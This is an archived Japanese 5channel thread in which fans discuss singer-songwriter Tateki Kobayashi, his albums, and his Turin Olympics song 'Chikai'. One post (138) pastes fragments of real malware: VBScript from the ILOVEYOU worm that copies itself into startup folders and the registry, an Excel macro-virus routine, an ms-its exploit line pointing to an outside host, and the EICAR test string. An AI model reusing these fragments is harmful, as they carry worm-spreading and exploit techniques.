5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

小林建樹

1 :NO MUSIC NO NAME:2005/12/04(日) 00:49:57 ID:ert/MsyB
NHKのトリノオリンピックテーマ曲の楽曲提供(歌:平原綾香)でついに
日の目を見るのかそれともそのままか。

オフィシャル
ttp://www.tateki.net/

2 :NO MUSIC NO NAME:2005/12/04(日) 01:17:37 ID:a5cWrOnG
キタ━━━━(゜∀゜)━━━━ッ!! 
そんなすごい事になってたんか・・・昔はファンクラブ入ってたけどw

3 :NO MUSIC NO NAME:2005/12/04(日) 01:29:46 ID:a5cWrOnG
1ST 曖昧な引力 ・・・デビュー作。やや粗いし閉塞感もあるものの聴き応えあり。
2ND Rare  ・・・ヒット曲祈りを含むが、曲調が多彩なためブックオフ250円の常連。
3RD Music Man ・・・割りと聴きやすいものの、深みは前2作に劣るか?
4TH?リバース  ・・・Ride on timeなどがあり、ざっくりした開放感ある感じ(6曲目除く)
ベストBLUE NOTES ・・・バランス良く選曲されており、初心者はこれが無難。

以下インディーズ
WINDOW・・・リバースよりさらに開放感あり。聴きやすさ・キャッチーさは高い。
SHADOW・・・姉妹作。やや暗めな曲、挑戦をしている曲が多い。繊細で綺麗な音。

興味を持ってくださった方は↑をご参考に。



4 :NO MUSIC NO NAME:2005/12/04(日) 09:27:44 ID:qPPk2Xnf
小林建樹かぁ

「曖昧な引力」は聴きまくったな〜

「スウィートランデヴー」を初めてラジオで耳にした時「この曲すげ〜!!」と、かなり感動した記憶があるなぁ…

「Rare」は中古でゲットしたが、ほとんど聴いてなかったや…
久々に聴いてみるか

5 :NO MUSIC NO NAME:2005/12/04(日) 22:46:43 ID:Mql1araT
おっ いきなりのビッグニュースにスレ立ったかなと思って来てみたら
やっばり立ってた!
スレ立て乙ですっ

これで再び日の目を浴びるのねん 感無量

6 :NO MUSIC NO NAME:2005/12/05(月) 11:13:21 ID:d/qvAULD
祈りage

DAMで93点ですた

7 :NO MUSIC NO NAME:2005/12/05(月) 12:47:57 ID:788Swphl
昨日全部一通り聞きなおしたけど、
一言で言うと、惜しい曲が多い気がする。
もうほんのちょっと何かが違えば、専門家筋に絶賛されるか、一般受けするか、
あるいはその両立さえもできそうなんだけど。
それが何なのかはよく分からん。

ともあれ、セルフカバーでCDが出せるぐらいに誓いが売れてくれることを祈る。

8 :NO MUSIC NO NAME:2005/12/05(月) 12:51:06 ID:788Swphl
連続スマソ

平原氏(あるいはそのスタッフ)がどうやって白羽の矢を立てたのか気になる。
ゴリ押しできる権力なんかないだろうし、誰かがよほど気に入ったんだろうな。
これをきっかけに亀田誠司とつながりができれば、今後にもつながるかもしれん。

9 :NO MUSIC NO NAME:2005/12/07(水) 01:08:43 ID:0SG3tnqg
もうすぐ34歳だしな。 ほんとここらでなんとかなってほしいっす。
平原嬢、歌詞に共感して選んだとか言ってたな。
やはり何曲か候補があって その中から本人が選んだのかな。
メディアで歌う平原嬢の後ろで ピアノでも弾くタテキ氏が見られるといいな。

10 :NO MUSIC NO NAME:2005/12/07(水) 04:00:02 ID:Kn+YBsmR
Rare好きだな〜
明るいのに澱んだ感じというか。
落ちてるときに良く聞くような…

11 :NO MUSIC NO NAME:2005/12/07(水) 11:35:19 ID:I9P6GBL3
聞きなおしてて、案外唄い方の幅が広いことに気付いた。
裏方もいいけど、本人が中心の曲も聞きたい。

12 :NO MUSIC NO NAME:2005/12/07(水) 12:02:37 ID:QAtuHJW9
タテキをいいと言ってる人に出会うと嬉しくなる

13 :NO MUSIC NO NAME:2005/12/07(水) 22:19:09 ID:zDnRwtfm
偶然NHKのスポーツ番組みてたら「誓い」が流れて
作詞作曲:小林建樹に驚いて検索してきてみた。
「誓い」サビあたりに建樹風味がでてたような・・・。一回しかきいてないけど。

「曖昧な引力」が一番好き。
ライブはここ2年ほど見てないな。

14 :NO MUSIC NO NAME:2005/12/07(水) 22:37:31 ID:rfzpMiaL
曖昧な引力は日本音楽史に残すべき傑作だと思うが、残らないんだろうな。

15 :NO MUSIC NO NAME:2005/12/08(木) 01:31:21 ID:B05DUgfx
曖昧な引力イイんだ?!
探してみよ〜

16 :NO MUSIC NO NAME:2005/12/08(木) 21:57:50 ID:U/GbtT5n
みーあーげれぇばぁー月のないよるだぁったー

17 :NO MUSIC NO NAME:2005/12/08(木) 22:21:29 ID:YSI42yVL
しっかしブックオフ250円の常連になりつつあるな・・・
全部新品で買ったのに・・・

18 :NO MUSIC NO NAME:2005/12/09(金) 03:04:05 ID:sK09eUTU
ブクオフ近所に無い俺は負け組

19 :NO MUSIC NO NAME:2005/12/10(土) 00:38:04 ID:FzmOykXZ
ちがちゃんのブログもあるね

20 :NO MUSIC NO NAME:2005/12/10(土) 13:33:21 ID:aOBgHtOb
千ヶ崎氏のことかな?

3000円とは言え、名盤をいくつも聞けたから勝ち組

だと思うことにしてるorz

21 :NO MUSIC NO NAME:2005/12/12(月) 00:53:56 ID:MgzBOh8D
dat落ちを防ぐために、勝手にアルバム毎のベストの一曲をあげてみる

曖昧な引力:満月
Rare:祈り
Music Man:目覚め
リバース:Ride on Time
WINDOW:HOW
SHADOW:Am6
その他:花



22 :NO MUSIC NO NAME:2005/12/12(月) 13:37:55 ID:EY4/09Zy
>20 そうです、千ヶ崎ちゃん
>21 BLUE NOTES の「最初のメロディー」忘れてるだに

あぁ 「誓い」早く聴きて〜

23 :NO MUSIC NO NAME:2005/12/13(火) 22:05:27 ID:9miclPnk
サザンバージョンのOH!クラウディアを初めて聞いた。
なんとなく、建樹版の意図もよりはっきり見えた気がした。

次NHKでウィンタースポーツやるときは録画でもしとくかな。

24 :NO MUSIC NO NAME:2005/12/14(水) 08:04:10 ID:6K2ZmQxe
今朝「誓い」のPVが流れてた@めざましテレビ
ピアノ弾いてる人は登場してたけど、建樹氏かどうかは不明。
(というかテレビ付けたらいきなり歌ってたので詳細も不明…ゴメソ)

25 :NO MUSIC NO NAME:2005/12/14(水) 15:38:08 ID:IbQQt+bh
>>24
おおー!曲ちょっと聴けたんですね。建樹色は強かったですか?
曲のプロデュースには関わってないので、
アレンジ次第で建樹氏の作品とは違った風に聞こえるのかな。

26 :24:2005/12/14(水) 22:31:29 ID:ZsaEKShx
>>25
会社に遅れる〜とあせって化粧しながら見てたので、
あまり曲調までははっきりとは分からなかったですごめんなさい。
それでいいのか自分…それでもファンなのか自分…_| ̄|○

明日NHKの『音楽夢くらぶ』で平原さんが歌うらしいので、じっくり聴いてみます。

27 :25:2005/12/15(木) 11:24:54 ID:JvsAXbpN
>>26
いえいえ、お気になさらずに。情報ありがとうございます。
『音楽夢くらぶ』、自分もチェックしてみます!楽しみだー

28 :NO MUSIC NO NAME:2005/12/15(木) 23:42:54 ID:zfMJtkmZ
誓い

詞・曲 小林建樹

地上波で名前が表示されるのってイノセント以来?
提供用なのか、クセのないメロディー・歌詞に仕上げてきたなって印象だった。
前向きでスポーツに合ってる曲だと思う。

29 :NO MUSIC NO NAME:2005/12/15(木) 23:49:47 ID:OfoEgDxQ
今、『音楽夢くらぶ』で初めて「誓い」を聴いたけど
建樹の曲だなぁってしみじみ思う部分が所々あった。
華のある曲ではないけどよい歌だと思う。
売れると良いね。
でもって建樹が歌ってるのも聴きたい。

30 :NO MUSIC NO NAME:2005/12/19(月) 01:51:14 ID:E6h/aWMN
建樹verの誓い、ホームページでmp3形式で公開、とかないかな。
版権とかあるから難しいんだろうけど。

31 :NO MUSIC NO NAME:2005/12/27(火) 12:25:30 ID:/+xc5+CO


32 :NO MUSIC NO NAME:2005/12/27(火) 12:37:07 ID:DdrbA6jV
M1決勝、今年はおもろいなぁ!と思ったのに
たてさんはイマイチだったのか、、


33 :NO MUSIC NO NAME:2005/12/29(木) 12:25:53 ID:gn0F2A5U
久しぶりに建樹ネット見たら「誓い」の話が出ててすっとんできましたよ。
ゆずの「栄光の架橋」みたいに話題にならないかなあ
…作者までは話題にならないかorz

歌詞早く読みたい。んでもって建樹のライブで披露してほすい


34 :NO MUSIC NO NAME:2006/01/06(金) 23:16:43 ID:ZDCJEaNp
辛口かもしれないけどやっぱり曲を出す期間が無駄に空いちゃうのが
知名度があがらないもとになってると思うな〜。間違いなくいいアーティストだと思うのにな。

35 :NO MUSIC NO NAME:2006/01/08(日) 13:31:23 ID:JqxtgoHY
平原ライブの録画に失敗してorzな漏れが来ましたよ。

>34
まあ同意かな〜。今は裏方稼業がメインぽいけど
建樹の声を聴きたがってるファソは実は結構いるんだぞと。


36 :NO MUSIC NO NAME:2006/01/08(日) 16:57:39 ID:0q6lXNP1
リリースしたくても先立つものが無いんじゃないかな?
「WINDOW」「SHADOW」がそんなに売れたとは思えないし。
ここは一発「誓い」の頑張りに期待したいのだが。

37 :NO MUSIC NO NAME:2006/01/08(日) 22:17:58 ID:9A2cQPbG
ウィンドウとシャドウはインディーズチャートだったらかなり上位だった
記憶があるんだけど間違いだったかな?あと祈りって売れたときの順位はどれくらい
まで行ったのかだれかわかる人いますか?

38 :NO MUSIC NO NAME:2006/01/08(日) 22:50:31 ID:AB0IlYm+
祈りは5万枚のヒット。最高は40位ぐらいだったはず。

39 :37:2006/01/08(日) 23:10:25 ID:9A2cQPbG
なるほどね〜。有難うございます。

40 :NO MUSIC NO NAME:2006/01/11(水) 00:45:41 ID:Jj7qqoBI
Largoの曲ってすごい意味深だけどどういった経緯でできた曲だとか知ってるかたいたら是非ききたいです。
たしかあの曲は全パートタテキが演奏してるっていうのはネットラジオで言ってたような…。

41 :NO MUSIC NO NAME:2006/01/11(水) 09:44:29 ID:dQ0KqHea
平井堅スレより来ますた。この人才能あると思うけどね。
ちょっと堅臭もするし。Spoonとかもイイよね!

42 :NO MUSIC NO NAME:2006/01/11(水) 09:46:47 ID:dQ0KqHea
ハラホレヒレハレに提供なんかしないで、建樹に歌ってほしいな。

43 :NO MUSIC NO NAME:2006/01/11(水) 11:04:40 ID:dfouuz2F
>42
曲はカバーされてナンボって言ってたし、自分の曲を他人に歌ってもらうのは
本人も嬉しいんじゃないか?けど「誓い」は建樹にもぜひ歌ってほしい。

44 :NO MUSIC NO NAME:2006/01/11(水) 12:42:40 ID:oOhaIUwi
>>42 ハラホレヒレハレにワロタ

45 :NO MUSIC NO NAME:2006/01/11(水) 15:48:42 ID:dQ0KqHea
>>43 建樹がそういってるんなら仕方ないね。

建樹の曲ってメロディーが綺麗だから好き。顔もわりと好き。

46 :NO MUSIC NO NAME:2006/01/11(水) 23:59:29 ID:Jj7qqoBI
個人的にはノバラは名曲だと思う(´∀)

47 :NO MUSIC NO NAME:2006/01/13(金) 13:27:25 ID:Nvpcmh3Q
トリノまであとひと月程だよね
言うほど 聴こえてこないよね、「誓い」・・

48 :NO MUSIC NO NAME:2006/01/13(金) 14:04:59 ID:vpuWLZwp
俺なんてまだ一度も聴いたことないんだが…。
まあこれから嫌でも聴くようになるさw

49 :NO MUSIC NO NAME:2006/01/16(月) 15:45:22 ID:K6VAnG5G
いよいよ明後日発売だな。
漏れは明日CD屋に出てたらフラゲの構えあり。

50 :NO MUSIC NO NAME:2006/01/16(月) 22:44:51 ID:/HGJW32w
平井堅にパクられた人でしょ?
昔MAX好きだった人でしょ?

51 :NO MUSIC NO NAME:2006/01/17(火) 13:27:40 ID:GUlrrgE1
え、何?パクられたって。
そんな話あったの?

52 :NO MUSIC NO NAME:2006/01/17(火) 19:59:39 ID:8vtCHXuo
漏れも初耳だ<パクられ疑惑

今マイルームでは早速買ってきた「誓い」ヘビロテ中


53 :NO MUSIC NO NAME:2006/01/18(水) 00:41:05 ID:GCRHc3yA


54 :NO MUSIC NO NAME:2006/01/18(水) 12:17:21 ID:hK7PrG7G
祈り→RINGのことじゃない?たぶん。

55 :NO MUSIC NO NAME:2006/01/18(水) 23:38:53 ID:uf2DRwaN
KENは聴かないからわからないなー
似てるんですか?


56 :NO MUSIC NO NAME:2006/01/18(水) 23:52:59 ID:VdRBl0AD
たしかに似てるようなメロディーが一部あるきがするな…。
発売されたときから密かに思ってたけど。まあそんなことはどうでもいいさ〜。

57 :NO MUSIC NO NAME:2006/01/21(土) 02:42:22 ID:dtX5fNGq
そっか、似てる部分がある位で すぐパクリとか言い出すのはさすが2ch。。

今日 Mステで ハラホレヒレハレ嬢 熱唱してたね。
建樹ならどう歌いこなすんだろうと想像した。

58 :NO MUSIC NO NAME:2006/01/23(月) 20:33:05 ID:dW9WIdiq
ジャズ/クラシック(というか現音?)寄りな感覚は平原綾香の曲を
作るというのも納得な組み合わせという感じもする。

あんまり売れなかったとしてもオリンピック期間中は流れまくるだろうから、
ということは印税はそこそこ入ってくるだろうし、
ということは自身の新作も期待してしまうわけで。

それともこれを機にプロデューサー業を本格化させるか。
どっちにしろ音楽家としての転機になる予感。

59 :NO MUSIC NO NAME:2006/01/23(月) 20:57:46 ID:dW9WIdiq
ついでにiTMSで売り上げトップおめでとう。

60 :NO MUSIC NO NAME:2006/01/25(水) 22:57:22 ID:PCMBl66b
う〜ん、どこの掲示板もなんだか書きにくいなぁ・・
なんちゅうか、ほんちゅうか
みなさんはどう?

61 :NO MUSIC NO NAME:2006/01/26(木) 23:39:17 ID:1Bd0BQO3
あぁ たてちゃんお誕生日なのね。おめでとう
ってここで言ってもね・・・

62 :NO MUSIC NO NAME:2006/02/02(木) 22:57:30 ID:bTBxTi4l



63 :NO MUSIC NO NAME:2006/02/05(日) 08:01:52 ID:9zNu1cyY
きのうNHKの平原の特番にちょっとだけ出てた

64 :NO MUSIC NO NAME:2006/02/05(日) 13:45:23 ID:xOJCT+25
それリピートだよ また夜中まで見てしまった
たてきの横で恐い顔して 歌詞を直していく平原にドキドキしてしまった

65 :NO MUSIC NO NAME:2006/02/05(日) 23:33:35 ID:J/quwh9U
>21
曖昧な引力:満月
Rare:進化
Music Man:ピカレスク
個人的に・・・。

66 :NO MUSIC NO NAME:2006/02/11(土) 16:42:58 ID:TkHVTHba
REPLAY 祈り 大好きだ。ピアノの音の曲大好き♪
高音いいねぇ。
声の出し方も色々でおもしろい。特異だと思う。

ハラホレヒレハレに提供した誓い、本人に歌ってほしいなぁ。

67 :NO MUSIC NO NAME:2006/02/11(土) 16:49:49 ID:TkHVTHba
建樹のビジュアルも意外とすき。Rareの横顔ィイ(・∀・)+ ゚

68 :NO MUSIC NO NAME:2006/02/11(土) 16:55:06 ID:TkHVTHba
BLUE NOTESほしいわー。建樹の声って、孤独なときに聴きたくなる。
そして立ち直る漏れ(゜∀゜)!!

69 :NO MUSIC NO NAME:2006/02/12(日) 02:35:52 ID:AkVC+vdh
本当にメディアに出て知名度上がればJPOP史に間違いなく名を残す人になると思うよ。
ただできたら新作の制作ペースを上げてもらいたいとも思う…。シングルでいいから出してくれ〜!

70 :NO NAME NO MUSIC:2006/02/12(日) 02:55:15 ID:z6XhbBI1
NHKトリノ放送でかかるジャジーな誓いに耳を凝らしてしまう

タテキが誓い歌うにはキー高すぎて難しそう

何度もタテキライブがあったバナナホールがつぶれるかもしれないと最近、新聞読んで知ったんだけど何かさみしい。。

71 :NO MUSIC NO NAME:2006/02/14(火) 22:47:22 ID:gMlZ6flX
>>69 だね。独特な才能あると思う。声の好き嫌いあるかもしれないけど。
私はすきです(*´д`*)
日記みて思ったんだけど、あまりタフじゃないのかもね。
繊細? な感じがする。

それにしても建樹さん老けすぎw
40過ぎぐらいに見える! 頬がすごいこけてるから?

72 :NO MUSIC NO NAME:2006/02/15(水) 01:48:13 ID:hSTQEtLb
俺には逆に若いか年相応に見えるけどな〜?

73 :NO MUSIC NO NAME:2006/02/16(木) 12:25:51 ID:TMHCm3ny
>70 そう!バナナホール危機なんだってね。
さみしいですね、飾り気のないライブハウスだったけれども。

タテキの顔、日記の写真写りだと確かにすごい老けてみえるかも。
実際に会うと艶っぽさというか色気がある、と思う。
しかし、ライブはないのかライブ! 新譜はまだか新譜!

74 :NO MUSIC NO NAME:2006/02/16(木) 13:52:16 ID:LsYcOvwu
REPLAYって、建樹自身の実体験?
ほら、この人でビュー27歳ぐらいだし。

75 :NO MUSIC NO NAME:2006/02/16(木) 20:42:44 ID:HnV3GtS7
実際見ると若く見えるよね
肌もきれいだと思う


76 :NO MUSIC NO NAME:2006/02/18(土) 00:53:51 ID:xXT+ytF1
7周年か。。
ここいらでワルツが聴きたくなりました。

77 :NO MUSIC NO NAME:2006/02/20(月) 11:40:45 ID:wepz7hXK
未発表曲いっぱいあるのにね
それももう記憶のかなた・・どんな曲だったか?

78 :NO MUSIC NO NAME:2006/02/20(月) 23:06:53 ID:D1pMsphI
オリンピックがこう不調だと誓いのセールスも伸びない・・・

ブルーボーイブルース(BBB)とか、スクリームとか、
最後の言葉とか、なんか色々あった気はする。

79 :NO MUSIC NO NAME:2006/02/21(火) 12:29:17 ID:o/J//I78
「誓い」って結構ダウンロードの
チャートは上位だね

80 :NO MUSIC NO NAME:2006/02/22(水) 00:13:42 ID:IRBBh9zN
>74
本当に挫折したって聞いたことある
たぶん30才位の時に

81 :NO MUSIC NO NAME:2006/02/22(水) 08:34:21 ID:OLtp9sO2
どんな挫折?
もうデビューはしていたのに?

82 :NO MUSIC NO NAME:2006/02/24(金) 00:15:53 ID:FBwvj7sT
どんな挫折かは知らないけどマネージャさんに
辞めたいって言ったらしいよ

83 :NO MUSIC NO NAME:2006/02/24(金) 12:07:44 ID:tyuGkngm
平原への楽曲提供
建樹のおかんも喜んだだろうね

84 :NO MUSIC NO NAME:2006/02/27(月) 03:59:25 ID:XlNPu/Sz
建樹すきだよ。メロディーがキレイだよね。
日記みたけど猫すきなんだ〜(´∀`)

建樹は大器晩成型だと思う。
平井堅みたいにブレイクするときが来てほしい。

けどプロデュース業もいいかもしれないね。
ヒラハラじゃなくて、違う人のほうがいいかも。

85 :NO MUSIC NO NAME:2006/02/27(月) 23:41:04 ID:pRlb3jFg
トリノオリンピック終わっちゃったね。
金メダルの荒川選手のニックネームと生年月日が
老舗ファンサイトをされてる方とシンクロしてることに気付いた。

86 :NO MUSIC NO NAME:2006/03/02(木) 02:03:21 ID:rmI0h0EO
で? っていう

87 :NO MUSIC NO NAME:2006/03/05(日) 00:56:38 ID:vsmk2BCz
ひとまず裏方には一区切りつきそう?
今の建樹の歌声が聴きたい。何かリリースしてくれないかな


88 :NO MUSIC NO NAME:2006/03/09(木) 12:14:20 ID:frcTbIG1
もう待ちくたびれたよ
顔すら忘れちゃうよ


89 :NO MUSIC NO NAME:2006/03/09(木) 20:38:09 ID:KYkQeOmz
世間に広く認められないタイプの天才でしょ

90 :NO MUSIC NO NAME:2006/03/11(土) 21:05:21 ID:fdLeYZhF
斜陽好きだな。斜陽。

91 :名無しのマリー:2006/03/11(土) 23:23:22 ID:0y3Zh/Qc
建樹の歌声が好きな者としては、「誓い」の抜擢は素直に喜べない面もあるなあ。
もちろん、それによって音楽活動しやすくなるのは喜ばしい事なんだけど、
あくまでコンポーザーじゃなく、シンガーソングライターの建樹が好きなんであって。
でも音楽以外で生きていくことは出来ない人だろうし、
これをきっかけに成功してほしいと強く願っているんだけど、
全然建樹の歌を聞く事が出来ない今の状況は寂しい。
ともあれ、ひっそりスレから見守ってきた者としては、
また単独スレが立ったのはうれしい限りです。


92 :NO MUSIC NO NAME:2006/03/15(水) 23:30:20 ID:BhwKNnrp
たてきの日記から関西弁が抜けて行くのがさみしい

93 :NO MUSIC NO NAME:2006/03/19(日) 01:59:43 ID:EJ53Ryeh
東京住まいも長いからねえ
まだ10年までいかないけど経ってるでしょ

昔話
ラジオの公開生で「よゐこの濱口優に似てる」と観覧者の女の子がウケてたのに対し
「似てへんよ」とムッとしてたのがおかしかった


94 :NO MUSIC NO NAME:2006/03/20(月) 10:54:21 ID:73kjf0E3
どごがマッサルに似てるんだろ?その感性の方がおもしろい


95 :NO MUSIC NO NAME:2006/03/28(火) 11:25:06 ID:XsbuybCn
モーツァルトがいいのは解るけど趣味じゃないんだよな
叙情的なメロディが好き

96 :NO MUSIC NO NAME:2006/03/32(土) 20:57:40 ID:QGlldxWP
つーかなんでCDリリースしないのよこの人は

97 :NO MUSIC NO NAME:2006/04/02(日) 23:52:15 ID:vzpP20+f
CDリリースしてほしい。
ライブしてほしい。
地方に来て欲しい・・・。

98 :NO MUSIC NO NAME:2006/04/05(水) 16:12:50 ID:JUlejdH/
今なんか悩んでたりするのかな?
だからとりとめのない話しかしてくれないのかな。

99 :NO MUSIC NO NAME:2006/04/09(日) 01:48:42 ID:5pH9xY0U
もう本人名義のリリースはないような・・・

100 :NO MUSIC NO NAME:2006/04/11(火) 11:46:22 ID:DEBz+jOy
待つのに疲れた

101 :NO MUSIC NO NAME :2006/04/22(土) 19:31:32 ID:UCWOg+Dm
新しい曲聴きたいよー
SHADOWから全然で寂しいっす。
建樹さんの曲、大好きだよーーーーーーーーーー!


102 :NO MUSIC NO NAME:2006/04/23(日) 12:24:09 ID:CSOs70p8
ニューブリーズで千綿ヒデノリさんの横で演奏していた小林さんに一目惚れしました
まずはご挨拶まで

103 :NO MUSIC NO NAME:2006/04/23(日) 12:26:50 ID:O8bLkK9F
そんなケイコはノースリーブ!

104 :NO MUSIC NO NAME:2006/04/24(月) 00:29:27 ID:rHyK+oYa
>>102
いらっしゃいませ。
惚れていただいてうれしいのですが、残念ながら目にする機会はほとんどありません。
まずはCDをがんばって手に入れて聞いてみてください。

105 :NO MUSIC NO NAME:2006/04/24(月) 16:36:05 ID:oSs0h1aL
たまたま見たライブ映像で千ヶ崎学さんがひいてた。
建樹はもうライブしないのだろうか。
自分で歌う気がないのかなあ。

106 :NO MUSIC NO NAME:2006/04/25(火) 22:35:02 ID:qrRE88BG
建樹は音楽以外では生きていけない人間だと思うけど
表に出なくても生きていける人間でもあると思う。
裏方に回ってしまう可能性は高そう。

107 :NO MUSIC NO NAME:2006/04/27(木) 18:05:51 ID:v4OlNtCf
tef tefってどうなったか知ってる人います?

108 :NO MUSIC NO NAME:2006/04/30(日) 02:22:56 ID:Y8DNI3Ql
>>107
弟を加えてライブ活動してるよ。
http://www.fiberbit.net/user/threedew/main.html

109 :NO MUSIC NO NAME:2006/04/30(日) 08:30:05 ID:Kp+7H9Br
建樹って現代音楽から影響受けているの?

110 :NO MUSIC NO NAME:2006/04/30(日) 19:06:48 ID:9E9pFmDL
>>108
ホントだ・・・ありがとう。

111 :NO MUSIC NO NAME:2006/05/10(水) 20:58:28 ID:DnTdlY/b
建樹はHIPHOP嫌い?

112 :NO MUSIC NO NAME:2006/05/10(水) 21:24:25 ID:nI9ihF7N
確かにHIPHOPの向こうは劣悪な環境だったな。

113 :NO MUSIC NO NAME:2006/05/11(木) 18:48:53 ID:yZV2hBho
劣悪な環境かぁ〜
新譜つくれないのかな…

114 :NO MUSIC NO NAME:2006/05/11(木) 21:44:34 ID:Bz8f5bhN
つくらないだけのような気がしてきた。


115 :NO MUSIC NO NAME:2006/05/14(日) 15:08:12 ID:/wk338Af
ようするにHIPHOP文化が日本でも根付いてきたおかげで
その対極にあるような音楽を手掛ける建樹にとっては
活動の分野が制限されてしまって身動きが取れないでいるんだ
というのは考えすぎ?

116 :NO MUSIC NO NAME:2006/05/14(日) 18:06:12 ID:GuX90pmS
ヒップホッぷwを聞いてる人間は増えたけど、
全員がそれしか聞かないわけではないし、
そもそもそれ系に興味がない人間もいる。

どうしても日本だと周りの顔色伺わないといけないから、
聞いてるフリや興味があるフリする人間は多い。
まあ貧乏人が増えることでますます隆盛はするだろうけど。

とはいえ常にカウンターカルチャーの需要はあるわけで、
あくまで本人のやる気しだいだと思う。
広沢タダシなんてなぜかAVEXから曲出してたし。

117 :NO MUSIC NO NAME:2006/05/16(火) 10:58:54 ID:stwhvAMa
http://www.hmv.co.jp/product/detail.asp?sku=1290542

118 :NO MUSIC NO NAME:2006/05/16(火) 14:06:48 ID:FJkmT8IU
おお!情報サンクス!
ベストの割に値段安いのが気になるけど、追加曲あるなら買ってしまいそう。

119 :NO MUSIC NO NAME:2006/05/16(火) 18:57:54 ID:FlzzorWA
このベスト、タテキ本人の意思とは関係無いところで発売が決まったんだと思ってたけど
レビューを読むかぎりそういうわけではなさそうね。選曲には興味あるけど
買うかどうかは微妙・・・

120 :NO MUSIC NO NAME:2006/05/16(火) 20:40:06 ID:SaM0LjER
誓いセルフカバーY⌒Y⌒Y⌒Y⌒Y⌒Y⌒(。A。)!!!

121 :NO MUSIC NO NAME:2006/05/18(木) 17:46:23 ID:hICAIszq
此処に載っている「風の谷のナウシカ」についての詳細を教えて下さい。
http://www.nhk.or.jp/popjam/bn/2000/00-08.html

122 :NO MUSIC NO NAME:2006/05/19(金) 22:55:00 ID:J71hNm6t
「祈り」は確かにカラオケで歌えるけど、どれくらいヒットしたんですか?
オリコン最高位とか?

123 :NO MUSIC NO NAME:2006/05/20(土) 00:57:32 ID:onezOSQC
オリコン最高位はわかんないけど、
CDTVで50位以内に入ってたり、ポップジャムとか
Mステとかに出る程度には売れてたよ。
平井堅がブレイクしだした頃で、音楽雑誌なんかでは
同程度に扱われていて、よく隣のページに載ってた記憶がある。
ネクストブレイクなんつってね。


124 :NO MUSIC NO NAME:2006/05/21(日) 00:48:31 ID:5lkHXAWO
ベスト発売記念ライブないかな
あっても東京だけ?ならがっかりだ



125 :NO MUSIC NO NAME:2006/05/21(日) 23:56:59 ID:jtuNDVGE
この人なんで売れなかったんだろうね。
楽曲はほどよくキャッチーだしルックスも悪くないし、、、。

126 :NO MUSIC NO NAME:2006/05/22(月) 00:46:02 ID:xJ6GBa73
>121
篠原ともえが歌で建樹がピアノ弾いたんだよ。確か。
SPooNで出演したときだったとおもうんだけど
建樹が歌ったのが漏れてるね。

>125
良い曲、良いアーティストが売れるとは限らないからね〜。

127 :NO MUSIC NO NAME:2006/05/29(月) 23:33:30 ID:gq4KiRqA
曲提供した二人の明日でコーラスなんかもしちゃってるのかな
エリツィンとライブしたの3年前になるんだね
久々にまたやったりして

128 :NO MUSIC NO NAME:2006/05/30(火) 12:09:58 ID:K81Xu4rB
名盤しか作れない僕ですが、何か?

129 :NO MUSIC NO NAME:2006/06/03(土) 06:41:49 ID:7D+8HpSL
一時期ブレイクしかけてたよね?
テレビとかにも結構出てたし

130 :NO MUSIC NO NAME:2006/06/06(火) 22:29:32 ID:Gkt24haa
たてきーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー

131 :NO MUSIC NO NAME:2006/06/18(日) 18:01:28 ID:ZvVpm/2T
よーし!ベスト買うぞー。
ジャケ写すごいイイ感じだね。
これからも良い曲どんどん作ってくれよ〜〜〜

132 :NO MUSIC NO NAME:2006/06/18(日) 19:36:26 ID:M8krUvSo
すげえいい選曲だよねベスト。

133 :NO MUSIC NO NAME:2006/06/19(月) 22:59:22 ID:KfRyPTKb
この人、大学生の時、すごい流行ってたな。今、何してるの?結構好きだった
のに、いつの間にか消えてた

134 :NO MUSIC NO NAME:2006/06/20(火) 10:29:29 ID:Tl8jqcdk
>>133
最近の仕事は >>1

135 :NO MUSIC NO NAME:2006/06/25(日) 20:21:36 ID:8kH89WWS
「REPLAY」いい歌だけど、たけしの心の叫びを如実に現した歌なのかも。

136 :NO MUSIC NO NAME:2006/06/25(日) 21:03:52 ID:sp1iZ1n4
小林たけし。

137 :NO MUSIC NO NAME:2006/06/27(火) 21:42:31 ID:kISNXgy3
ミスチルとかレミオロメンのプロデューサー?

138 :NO MUSIC NO NAME:2006/07/02(日) 18:20:06 ID:05+w4Agc
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

139 :NO MUSIC NO NAME:2006/07/02(日) 19:16:48 ID:OmZrelEq
8月のナオさんアルバムリリースにあわせて
またジョイントしてほすぃ―――――――ょ。

140 :NO MUSIC NO NAME:2006/07/02(日) 19:51:45 ID:i5/gqCRR
>>139
禿同。
俺もして欲しい。

141 :NO MUSIC NO NAME:2006/07/02(日) 22:19:34 ID:OmZrelEq
久しぶりにツヨポンとも演ってるとこ見させてくれぃっ。

142 :NO MUSIC NO NAME:2006/07/06(木) 17:10:05 ID:1tTmq4DJ
誓いのコーラス、青木美智子さん?と思ったが
やるな〜 たてき
